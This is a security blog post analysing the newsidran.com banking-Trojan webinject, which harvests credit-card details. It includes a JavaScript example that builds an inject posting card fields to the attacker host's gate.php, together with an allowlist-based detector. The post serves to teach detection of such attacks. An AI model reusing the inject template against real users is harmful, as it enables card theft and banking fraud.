Fraud
December 12, 2015

Webinject Analysis: Newsidran.com

By Elman Reyes

Webinject attacks modify the web pages a victim's browser renders so that fraudsters can harvest credentials or act directly against the victim's accounts. The newsidran.com script injection serves as a good example of how these attacks are conducted, detected, and ultimately stopped.

A Trojan is a piece of malware that appears to the user to perform a desirable function but actually steals information or harms the system (perhaps in addition to the expected function). Banking Trojans employ two main techniques to steal users' credentials or initiate money transfers on their behalf: modifying the bank's web page on the client side, or hooking the browser so that data destined for the bank is captured inside the browser before it is encrypted by SSL/TLS (form grabbing), where network-level encryption offers no protection.

Recently several e-banking Trojans (Zeus, Cridex, and Citadel, for instance) have used script injection techniques to modify the original web page. The modification may enable the attacker to perform money transactions using the victim's own credentials. This is done by the Trojan injecting malicious JavaScript into the page in the client's browser once the victim's browser has loaded the targeted site. The injected code performs different functions, including attempting a money transfer from the client's account, extending the attacker's control to the victim's mobile device, and much more. To collect the data the injected code sends back, and to manage the injects and their functions, attackers have developed different types of command and control (C&C) systems. These systems are usually PHP-based applications backed by a SQL database.

In the newsidran.com example, the malware on an infected machine establishes a few variables before the injection takes place, the most significant of which are:

  • fAkEbotid.
  • fAkEbotname.

The inject's initial prompt asks the victim for various pieces of credit card information. Note that all communication and resources (such as images and scripts) used by this attack are loaded from the same newsidran.com domain name, which is a detail a defender can key on: a genuine bank page has no reason to reference that host at all.
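The following is an added example written for this page, not code from the report or from the malware. It models the two sides described above: a minimal Zeus-style inject that carries the bot identification variables and pulls its image, script and form target from the C&C host, and a check that flags a rendered page as injected because it references a host outside the bank's allowlist. The bank site (www.examplebank.test), the inject contents, and the assumption that fAkEbotid and fAkEbotname appear as plain JavaScript variable assignments are all constructed for illustration.

```javascript
// Added example (not from the original report): a minimal Zeus-style
// webinject modelled on the newsidran.com case, plus a detector for it.
// The bank page and inject contents are constructed; the assumption that
// the bot variables are emitted as plain JS assignments is ours.

// The genuine login page as served by the bank (constructed sample).
const CLEAN_PAGE = `<html><head>
<link rel="stylesheet" href="/css/site.css">
<script src="https://www.examplebank.test/js/login.js"></script>
</head><body>
<form id="login" action="/login" method="post">
  <input name="user"><input name="pass" type="password">
</form>
</body></html>`;

// Hosts the genuine page may legitimately load from or post to.
const ALLOWED_HOSTS = new Set(["www.examplebank.test"]);
const CNC_HOST = "newsidran.com";

// What the Trojan adds: bot identity, a credit-card prompt whose image and
// script come from the C&C host, and a form that posts the card data there.
function buildInject(botid, botname) {
  return `<script>var fAkEbotid = "${botid}"; var fAkEbotname = "${botname}";</script>
<script src="https://${CNC_HOST}/js/inject.js"></script>
<img src="https://${CNC_HOST}/img/verify.png">
<form action="https://${CNC_HOST}/gate.php" method="post">
  <input name="ccnum"><input name="expiry"><input name="cvv">
  <input type="hidden" name="bot" value="${botid}">
</form>`;
}

// The inject is spliced into the page the browser renders (here: before
// </body>) after the page arrives from the bank but before the user sees it.
function injectIntoPage(html, inject) {
  return html.replace("</body>", inject + "\n</body>");
}

// Every host referenced by src/href/action; relative URLs are first-party.
function extractHosts(html) {
  const attrRe = /\b(?:src|href|action)\s*=\s*["']([^"']+)["']/gi;
  const hosts = [];
  let m;
  while ((m = attrRe.exec(html)) !== null) {
    try {
      hosts.push(new URL(m[1], "https://www.examplebank.test/").hostname);
    } catch (e) { /* skip attribute values that are not URLs */ }
  }
  return hosts;
}

// Referenced hosts outside the allowlist, deduplicated.
function findForeignHosts(html, allowed = ALLOWED_HOSTS) {
  return [...new Set(extractHosts(html))].filter(h => !allowed.has(h));
}

// Bot identification variables carried by the inject, if any.
function extractBotVariables(html) {
  const out = {};
  const varRe = /\bvar\s+(fAkEbotid|fAkEbotname)\s*=\s*["']([^"']*)["']/g;
  let m;
  while ((m = varRe.exec(html)) !== null) out[m[1]] = m[2];
  return out;
}

// Verdict for one rendered page: any foreign host means the page was altered.
function analysePage(html) {
  const foreignHosts = findForeignHosts(html);
  return {
    injected: foreignHosts.length > 0,
    foreignHosts,
    botVariables: extractBotVariables(html),
  };
}

const INJECTED_PAGE = injectIntoPage(CLEAN_PAGE, buildInject("a1b2c3", "bot-7"));
console.log(JSON.stringify(analysePage(CLEAN_PAGE)));
console.log(JSON.stringify(analysePage(INJECTED_PAGE), null, 2));
```

The allowlist check is deliberately simple: it catches this particular inject because every resource it needs comes from newsidran.com. An inject that serves its resources from a compromised host the bank already trusts, or that inlines everything, would need a content-based check (a hash of the page's scripts, or a match on the bot variable names) rather than an origin check alone.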

The full version of this report is available for download.
